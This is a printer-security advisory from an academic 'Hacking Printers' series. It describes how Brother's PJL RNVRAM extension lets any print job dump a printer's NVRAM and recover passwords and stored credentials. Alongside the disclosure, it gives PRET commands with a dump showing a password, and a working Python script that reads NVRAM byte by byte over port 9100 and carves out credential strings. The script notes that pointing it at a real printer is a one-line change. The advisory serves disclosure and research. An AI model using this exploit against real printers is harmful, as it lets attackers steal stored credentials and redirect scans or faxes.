TL;DR: In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 3 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
abusing Brother's proprietary PJL extensions to dump the printer's NVRAM
and gain access to interesting stuff like passwords. The attack can be
performed by anyone who can print, for example through USB or network.
It can even be carried out by a malicious website, using advanced
cross-site printing techniques in combination with a novel technique we
call `CORS spoofing' (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

======================[ Memory Access with PJL ]======================

-------------------------[ Affected Devices ]-------------------------

This vulnerability may potentially affect all Brother-based laser
printers. It has been verified for the devices listed below:

- Brother MFC-9120CN (Firmware version: K.1.06)
- Brother DCP-9045CDN (Firmware version: G.1.10)
- Konica Minolta bizhub 20p (Firmware version: 3.11)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Brother Laser Printer Technical Reference Guide' defines PJL
commands to `write data to or retrieve data from the specified address
of the printer's NVRAM':

----------------------------------------------------------------------
@PJL RNVRAM ADDRESS = X
----------------------------------------------------------------------

By incrementing the integer X and dumping the whole NVRAM, an attacker
can gain access to the embedded web server password. Furthermore, if
set, user PINs as well as passwords for POP3/SMTP, FTP and Active
Directory profiles can be obtained. No authentication is required: the
commands are accepted as part of an ordinary print job.

For MFPs, the attacker may also be able to change the Scan-to-FTP
settings, so that scanned documents are delivered to an
attacker-controlled FTP server, or swap fax numbers in the address book
so that faxes are sent to the attacker's fax number instead.

This issue is not new. It has been discussed by Andrei Costin and
others. However, it still seems to be present in Brother devices.

-------------------------[ Proof of Concept ]-------------------------

A Python-based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. The attack can be reproduced as
follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

-----------------------[ Further Information ]------------------------

Information on Brother's NVRAM access bug/feature can be found at:

http://hacking-printers.net/wiki/index.php/Memory_access
http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf
http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf
http://seclists.org/fulldisclosure/2013/Feb/40
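The dump loop described above (increment X, issue one RNVRAM request per
address, collect the bytes, then look for printable strings such as the
web server password) as an added, self-contained example. This is not
PRET's code and not Brother's; it assumes the device answers each request
with a line of the form `@PJL RNVRAM ADDRESS = X DATA = Y` where Y is the
byte value in decimal, and the `FakeBrotherPrinter` class and its NVRAM
content are constructed so the example runs offline. `tcp_transport` is
the raw port 9100 variant a tester would use against a real device.

```python
"""Dump NVRAM via Brother's PJL RNVRAM extension and carve strings from it.

Added example, not PRET's or Brother's code. Assumed reply format:
    @PJL RNVRAM ADDRESS = X DATA = Y\r\n      (Y = byte value, decimal)
"""
import re
import socket

UEL = b"\x1b%-12345X"                      # Universal Exit Language: enter PJL
DATA_RE = re.compile(rb"DATA\s*=\s*(\d+)")  # assumed reply format (see above)


def build_rnvram(addr):
    """PJL job that reads one NVRAM byte at address `addr` (from the advisory)."""
    return UEL + b"@PJL RNVRAM ADDRESS = %d\r\n" % addr


def parse_rnvram(reply):
    """Byte value carried in an RNVRAM reply, or None if the reply is unusable."""
    m = DATA_RE.search(reply)
    if not m:
        return None
    value = int(m.group(1))
    return value if 0 <= value <= 255 else None


def dump_nvram(send, start=0, end=2048):
    """Read NVRAM addresses [start, end), one request per byte.

    `send(cmd_bytes) -> reply_bytes` abstracts the transport, so the same
    loop runs against tcp_transport() or the offline fake below. Stops at
    the first address the device does not answer for.
    """
    out = bytearray()
    for addr in range(start, end):
        value = parse_rnvram(send(build_rnvram(addr)))
        if value is None:
            break
        out.append(value)
    return bytes(out)


def carve_strings(blob, min_len=6):
    """Printable-ASCII runs of at least min_len bytes, like `strings` would show."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def tcp_transport(host, port=9100, timeout=3.0):
    """Transport for a real device over raw port 9100 (not used offline)."""
    sock = socket.create_connection((host, port), timeout=timeout)

    def send(cmd):
        sock.sendall(cmd)
        buf = b""
        while not buf.endswith(b"\r\n"):   # socket.timeout ends a silent device
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
        return buf
    return send


class FakeBrotherPrinter:
    """Constructed stand-in for a Brother device; its NVRAM content is made up."""
    CMD_RE = re.compile(rb"@PJL RNVRAM ADDRESS\s*=\s*(\d+)")

    def __init__(self, nvram):
        self.nvram = nvram

    def send(self, cmd):
        m = self.CMD_RE.search(cmd)
        if not m:
            return b"?\r\n"
        addr = int(m.group(1))
        if addr >= len(self.nvram):          # past the end: no answer at all
            return b""
        return b"@PJL RNVRAM ADDRESS = %d DATA = %d\r\n" % (addr, self.nvram[addr])


# Constructed sample NVRAM: padding, an admin password, padding, an FTP host.
SAMPLE_NVRAM = (b"\x00" * 40 + b"MyS3cretPassw0rd\x00"
                + b"\xff" * 20 + b"ftp.example.org\x00")

if __name__ == "__main__":
    dev = FakeBrotherPrinter(SAMPLE_NVRAM)          # swap for tcp_transport(host)
    blob = dump_nvram(dev.send, 0, 256)
    print("dumped %d bytes" % len(blob))
    for s in carve_strings(blob):
        print("  ", s)
```

Against a real device the only change is `dump_nvram(tcp_transport("printer"), 0, N)`; the upper bound N is device specific, which is why the loop simply stops once replies stop parsing rather than assuming a fixed NVRAM size.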